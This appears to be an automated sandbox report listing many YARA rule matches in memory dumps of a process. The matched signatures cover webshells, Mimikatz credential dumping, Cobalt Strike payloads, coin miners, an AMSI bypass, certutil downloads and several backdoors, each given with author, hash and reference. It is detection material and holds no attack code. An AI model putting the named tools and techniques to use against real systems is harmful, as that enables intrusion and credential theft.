Source: 0000000B.00000003.18271592322.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 0000000B.00000003.18319052048.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18274401983.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 0000000B.00000003.18306005609.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18298197645.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 0000000B.00000003.18283413145.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000B.00000003.18261319669.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18309206155.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18286653567.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18295010840.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18316812162.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18310588191.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18306864011.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18301160882.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18301160882.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18319660937.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 0000000B.00000003.18314132801.0000021B5FCD5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18284863225.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18295574601.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18295574601.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp, type: MEMORY Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18296480454.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18298785440.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18312010559.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18297885481.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp, type: MEMORY Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 0000000B.00000003.18317798030.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
